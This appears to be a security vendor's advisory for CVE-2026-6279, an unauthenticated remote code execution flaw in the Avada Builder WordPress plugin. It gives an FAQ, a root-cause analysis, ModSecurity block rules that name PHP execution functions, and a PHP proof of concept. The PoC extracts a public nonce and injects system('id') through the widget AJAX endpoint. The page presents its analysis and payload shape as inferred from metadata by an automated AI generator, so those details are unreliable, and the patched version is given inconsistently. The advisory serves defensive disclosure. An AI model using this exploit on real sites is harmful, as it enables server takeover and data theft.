How does the vulnerability work?

The vulnerability allows attackers to send crafted requests to the `fusion_get_widget_markup` AJAX endpoint, which is accessible to unauthenticated users. By including a malicious payload in a base64-encoded JSON blob, attackers can invoke arbitrary PHP functions without proper validation.

Who is affected by this vulnerability?

Any WordPress site using the Avada Builder (fusion-builder) plugin version 3.15.2 or earlier is at risk. Administrators should check their plugin version and update if necessary.

How can I check if I am vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to ‘Plugins’, and locate the Avada Builder (fusion-builder) plugin. If the version is 3.15.2 or earlier, your site is vulnerable.

What is the CVSS score for this vulnerability?

CVE-2026-6279 has a CVSS score of 9.8, indicating a critical severity level. This score reflects the high risk of exploitation and potential impact on confidentiality, integrity, and availability.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Avada Builder (fusion-builder) plugin to version 3.15.3 or later, where the issue has been addressed. Regularly check for updates and apply them promptly.

What are the potential risks associated with this vulnerability?

If exploited, this vulnerability allows attackers to execute arbitrary PHP code, leading to full site compromise. This can result in data theft, unauthorized administrative access, and potential lateral movement within the hosting environment.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can extract the nonce from a public page and use it to send a crafted request to the vulnerable AJAX endpoint. This demonstrates the ease of exploitation due to the lack of input validation.

What is the nonce and why is it relevant?

The nonce (`fusion_load_nonce`) is a security token intended to protect AJAX requests. However, in this case, it is predictable and exposed in public-facing pages, allowing attackers to exploit the vulnerability without authentication.

How can I further secure my WordPress site?

In addition to updating vulnerable plugins, consider implementing security plugins, regular backups, and monitoring for unusual activity. Educate users about security best practices and keep all software up to date.

Are there any known exploits in the wild?

As of the disclosure date, there have been reports of this vulnerability being actively exploited. It is crucial to apply patches immediately to prevent potential attacks.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Avada Builder plugin until a patch can be applied. Review server logs for any suspicious activity and enhance monitoring to detect potential exploitation attempts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 – Unauthenticated Remote Code Execution via PHP Function Injection via 'render_logics' Shortcode Attribute via Widget AJAX Handler (fusion-builder)

Q: What is CVE-2026-6279?

CVE-2026-6279 is a critical vulnerability in the Avada Builder (fusion-builder) plugin for WordPress, allowing unauthenticated remote code execution via PHP function injection. This occurs due to improper handling of user input in the `get_value()` method, which allows attackers to execute arbitrary PHP code.

CVE ID CVE-2026-6279

Plugin fusion-builder

Severity Critical (CVSS 9.8)

CWE 74

Vulnerable Version 3.15.2

Patched Version —

Disclosed May 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6279 (metadata-based): This vulnerability allows unauthenticated remote code execution via PHP function injection in the Avada Builder (fusion-builder) plugin for WordPress, versions up to and including 3.15.2. The CVSS score of 9.8 reflects the critical severity, with network-based exploitation requiring no authentication or user interaction.

The root cause lies in the wp_conditional_tags case within Fusion_Builder_Conditional_Render_Helper::get_value(). Based on the CWE-74 classification (Improper Neutralization of Special Elements in Output Used by a Downstream Component) and the description, Atomic Edge analysis infers that the plugin passes attacker-controlled values from a base64-decoded JSON blob directly to call_user_func() without implementing an allowlist or sanitization. The description confirms this pattern: values traverse from a decoded JSON payload into a PHP function call with no validation of which function or arguments can be invoked. Atomic Edge research cannot confirm the exact code path without a source code diff, but the CWE and description strongly indicate this is a classic function injection vulnerability where an attacker controls both the function name and its parameters.

Exploitation targets the fusion_get_widget_markup AJAX endpoint, registered for unauthenticated users via wp_ajax_nopriv_fusion_get_widget_markup. The endpoint requires a nonce (fusion_load_nonce), but this nonce is generated for user ID 0 and exposed in the JavaScript output of any public page containing a [fusion_post_cards] or [fusion_table_of_contents] element. The attacker extracts this nonce from the page source, then sends a POST request to /wp-admin/admin-ajax.php with action=fusion_get_widget_markup, the nonce, and a base64-encoded JSON blob containing the malicious function and parameters in the render_logics attribute. The payload reaches call_user_func() without allowlist filtering, enabling execution of arbitrary PHP functions like system(), exec(), or assert().

The patched version (3.15.3) likely implements an allowlist of permitted functions or uses a more restrictive approach such as whitelisting specific comparison operators and values, or replacing call_user_func() with a switch-case that validates the function name against a predefined set. The fix must sanitize and validate the decoded JSON data before passing any value to a PHP execution function.

Successful exploitation grants unauthenticated attackers the ability to execute arbitrary PHP code on the WordPress server. This leads to full site compromise, including data theft, creation of administrative accounts, file uploads, server takeover, and potential lateral movement within the hosting environment. The impact aligns with the CVSS vector’s confidentiality, integrity, and availability ratings set to HIGH.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6279 (metadata-based)
# Blocks unauthenticated PHP function injection via Avada Builder's fusion_get_widget_markup AJAX endpoint
# Based on CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component
# This rule blocks POST requests to admin-ajax.php with the specific action and base64-encoded JSON payloads
# that contain function calls in the render_logics parameter

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6279 Avada Builder RCE via fusion_get_widget_markup AJAX',severity:'CRITICAL',tag:'CVE-2026-6279',tag:'wordpress',tag:'avada-builder',tag:'rce'"
  SecRule ARGS_POST:action "@streq fusion_get_widget_markup" "chain"
    SecRule ARGS_POST:data "@rx function" "t:lowercase,t:urlDecode"

# Alternative rule targeting the base64-encoded payload pattern
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-6279 Avada Builder RCE via encoded payload',severity:'CRITICAL',tag:'CVE-2026-6279',tag:'wordpress',tag:'avada-builder',tag:'rce'"
  SecRule ARGS_POST:action "@streq fusion_get_widget_markup" "chain"
    SecRule ARGS_POST:data "@rx system|exec|shell_exec|passthru|popen|proc_open|assert|eval|base64_decode" "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6279 - Avada (Fusion) Builder <= 3.15.2 - Unauthenticated Remote Code Execution via PHP Function Injection

// Configurable target URL
$target_url = 'http://example.com';

// Step 1: Fetch the target page to extract the nonce
// The nonce is usually in a script tag with id='fusion-post-cards-js-extra' or similar
$page_content = file_get_contents($target_url);
if ($page_content === false) {
    die('Error: Could not fetch target URL.n');
}

// Extract the nonce from JavaScript variable fusion_load_nonce
// Pattern: "fusion_load_nonce":"<nonce_value>"
preg_match('/"fusion_load_nonce":"([a-f0-9]+)"/', $page_content, $matches);
if (empty($matches[1])) {
    // Try alternate pattern for standalone nonce script block
    preg_match('/var fusionNonces*=s*"([a-f0-9]+)"/', $page_content, $matches);
}
if (empty($matches[1])) {
    die('Error: Could not extract fusion_load_nonce from page. Ensure the page contains a Fusion Post Cards or Table of Contents element.n');
}
$nonce = $matches[1];
echo "[+] Extracted nonce: $noncen";

// Step 2: Craft the malicious payload
// The vulnerability passes base64-decoded JSON to call_user_func()
// We will inject system() with 'id' command as example
// The payload structure mimics what the plugin expects for render_logics attribute
$payload = [
    'widget_id' => 'example_widget',
    'render_logics' => [
        [
            'condition_type' => 'wp_conditional_tags',
            'condition_value' => base64_encode(json_encode([
                'function' => 'system',
                'args' => ['id']
            ]))
        ]
    ]
];

$post_data = [
    'action' => 'fusion_get_widget_markup',
    'fusion_load_nonce' => $nonce,
    'data' => json_encode($payload)
];

// Step 3: Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
if (curl_errno($ch)) {
    die('Error: cURL failed - ' . curl_error($ch) . 'n');
}
curl_close($ch);

echo "[+] Server response:n$responsen";
// Expected output contains the result of 'id' command if successful
// Example: "uid=33(www-data) gid=33(www-data) groups=33(www-data)"

Frequently Asked Questions

What is CVE-2026-6279?
Overview of the vulnerability
CVE-2026-6279 is a critical vulnerability in the Avada Builder (fusion-builder) plugin for WordPress, allowing unauthenticated remote code execution via PHP function injection. This occurs due to improper handling of user input in the `get_value()` method, which allows attackers to execute arbitrary PHP code.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send crafted requests to the `fusion_get_widget_markup` AJAX endpoint, which is accessible to unauthenticated users. By including a malicious payload in a base64-encoded JSON blob, attackers can invoke arbitrary PHP functions without proper validation.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Avada Builder (fusion-builder) plugin version 3.15.2 or earlier is at risk. Administrators should check their plugin version and update if necessary.
How can I check if I am vulnerable?
Steps to verify your plugin version
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to ‘Plugins’, and locate the Avada Builder (fusion-builder) plugin. If the version is 3.15.2 or earlier, your site is vulnerable.
What is the CVSS score for this vulnerability?
Understanding the severity rating
CVE-2026-6279 has a CVSS score of 9.8, indicating a critical severity level. This score reflects the high risk of exploitation and potential impact on confidentiality, integrity, and availability.
How can I fix this vulnerability?
Recommended actions for mitigation
To mitigate this vulnerability, update the Avada Builder (fusion-builder) plugin to version 3.15.3 or later, where the issue has been addressed. Regularly check for updates and apply them promptly.
What are the potential risks associated with this vulnerability?
Impact of successful exploitation
If exploited, this vulnerability allows attackers to execute arbitrary PHP code, leading to full site compromise. This can result in data theft, unauthorized administrative access, and potential lateral movement within the hosting environment.
What does the proof of concept demonstrate?
Understanding the exploit mechanics
The proof of concept illustrates how an attacker can extract the nonce from a public page and use it to send a crafted request to the vulnerable AJAX endpoint. This demonstrates the ease of exploitation due to the lack of input validation.
What is the nonce and why is it relevant?
Role of nonce in the vulnerability
The nonce (`fusion_load_nonce`) is a security token intended to protect AJAX requests. However, in this case, it is predictable and exposed in public-facing pages, allowing attackers to exploit the vulnerability without authentication.
How can I further secure my WordPress site?
Best practices for WordPress security
In addition to updating vulnerable plugins, consider implementing security plugins, regular backups, and monitoring for unusual activity. Educate users about security best practices and keep all software up to date.
Are there any known exploits in the wild?
Current status of exploitation
As of the disclosure date, there have been reports of this vulnerability being actively exploited. It is crucial to apply patches immediately to prevent potential attacks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the Avada Builder plugin until a patch can be applied. Review server logs for any suspicious activity and enhance monitoring to detect potential exploitation attempts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations